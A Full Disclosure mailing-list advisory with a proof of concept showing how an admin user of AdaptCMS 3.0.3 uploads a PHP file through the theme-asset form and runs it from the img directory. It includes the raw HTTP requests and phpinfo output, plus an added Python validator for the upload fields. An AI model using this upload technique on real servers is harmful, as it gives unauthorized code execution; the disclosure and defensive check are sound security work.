Message-ID: <CAF2Wu1bsds7qvHjT5FO5LUFJdHish3mKhd8n1J19xKWt_8dgug@mail.gmail.com>
Date: Sun, 1 Jun 2025 16:05:53 +0100
From: Andrey Stoykov <mwebsec@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Authenticated File Upload to RCE - adaptcmsv3.0.3
# Exploit Title: Authenticated File Upload to RCE - adaptcmsv3.0.3
# Date: 06/2025
# Exploit Author: Andrey Stoykov
# Version: 3.0.3
# Tested on: Debian 12
# Blog: https://msecureltd.blogspot.com/
Authenticated File Upload to RCE #1:
Steps to Reproduce:
1. Login as admin user and visit "System" > "Appearance" > "Themes" > "Default" > "Theme Files" and choose "Add New File"
2. Select "Add File"
3. In the "File Contents" add the following payload "<?php phpinfo(); ?>"
4. Choose "File Extension" to be "php" and set "Folder Location" to "Images"
5. Upon uploading the file it would be available under the "img" directory
// HTTP POST request
POST /adaptcms/admin/themes/asset_add/Default HTTP/1.1
Host: 192.168.58.131
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0
[...]
[...]
------geckoformboundary648cea5cd97a776abc03a12296adaf90
Content-Disposition: form-data; name="data[Asset][filename]"; filename=""
Content-Type: application/octet-stream
------geckoformboundary648cea5cd97a776abc03a12296adaf90
Content-Disposition: form-data; name="data[Asset][content]"
<?php phpinfo(); ?>
------geckoformboundary648cea5cd97a776abc03a12296adaf90
Content-Disposition: form-data; name="data[Asset][file_extension]"
php
------geckoformboundary648cea5cd97a776abc03a12296adaf90
Content-Disposition: form-data; name="data[Asset][file_name]"
test
------geckoformboundary648cea5cd97a776abc03a12296adaf90
Content-Disposition: form-data; name="data[Asset][folder]"
img/
------geckoformboundary648cea5cd97a776abc03a12296adaf90
Content-Disposition: form-data; name="data[Asset][theme]"
[...]
// HTTP Response
HTTP/1.1 302 Found
Date: Fri, 30 May 2025 16:06:57 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: PHP/5.6.40
Location: http://192.168.58.131/adaptcms/admin/themes/edit/Default#assets
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
// HTTP Request triggering the webshell
GET /adaptcms/app/webroot/img/test.php HTTP/1.1
Host: 192.168.58.131
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0
[...]
// HTTP Response triggering the webshell
HTTP/1.1 200 OK
Date: Fri, 30 May 2025 16:15:36 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: PHP/5.6.40
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 102019
[...]
<h1 class="p">PHP Version 5.6.40</h1>
</td></tr>
</table>
<table>
<tr><td class="e">System </td><td class="v">Linux debian 6.1.0-32-amd64 #1
SMP PREEMPT_DYNAMIC Debian 6.1.129-1 (2025-03-06) x86_64 </td></tr>
<tr>
[...]
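Added defender's example, not part of this advisory and not AdaptCMS code: the server-side check a theme-asset handler should apply to the three client-controlled fields seen in the POST above (data[Asset][file_name], [file_extension] and [folder]) before writing anything under the webroot. The per-folder allowlist table and the WEBROOT path are assumptions for the example.

```python
import posixpath
import re

# Per-folder allowlist of extensions (constructed for this example; AdaptCMS
# ships no such table). Server-side script extensions are never listed, so a
# request for "php" in the img/ folder is rejected regardless of file name.
ALLOWED = {
    "img": {"png", "jpg", "jpeg", "gif", "webp"},
    "css": {"css"},
    "js": {"js"},
}
WEBROOT = "/var/www/adaptcms/app/webroot"   # assumed deployment path
NAME_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")  # one token: no dots, no separators


def validate_asset(file_name: str, file_extension: str, folder: str) -> str:
    """Return the only path this asset may be written to, or raise ValueError.

    Every field is matched against an allowlist; nothing submitted by the
    client is used verbatim to build the destination path.
    """
    folder_key = folder.strip("/").lower()
    if folder_key not in ALLOWED:
        raise ValueError(f"folder not allowed: {folder!r}")

    ext = file_extension.strip().lower().lstrip(".")
    if ext not in ALLOWED[folder_key]:
        raise ValueError(f"extension {ext!r} not allowed in {folder_key}/")

    # Rejects "test.php", "../x" and anything else that is not a bare name,
    # so a second extension cannot be smuggled in through the name field.
    if not NAME_RE.fullmatch(file_name):
        raise ValueError(f"bad file name: {file_name!r}")

    base = posixpath.join(WEBROOT, folder_key)
    dest = posixpath.normpath(posixpath.join(base, f"{file_name}.{ext}"))
    # Belt and braces: the normalised path must still sit inside the folder.
    if not dest.startswith(base + "/"):
        raise ValueError("path escapes asset folder")
    return dest


if __name__ == "__main__":
    print(validate_asset("logo", "png", "img/"))      # accepted
    for args in (("test", "php", "img/"), ("test.php", "png", "img/")):
        try:
            validate_asset(*args)
        except ValueError as exc:
            print("rejected:", exc)
```

Pair the check with web-server configuration that refuses to execute scripts under the asset folders, so a validation bypass still does not yield code execution.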
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/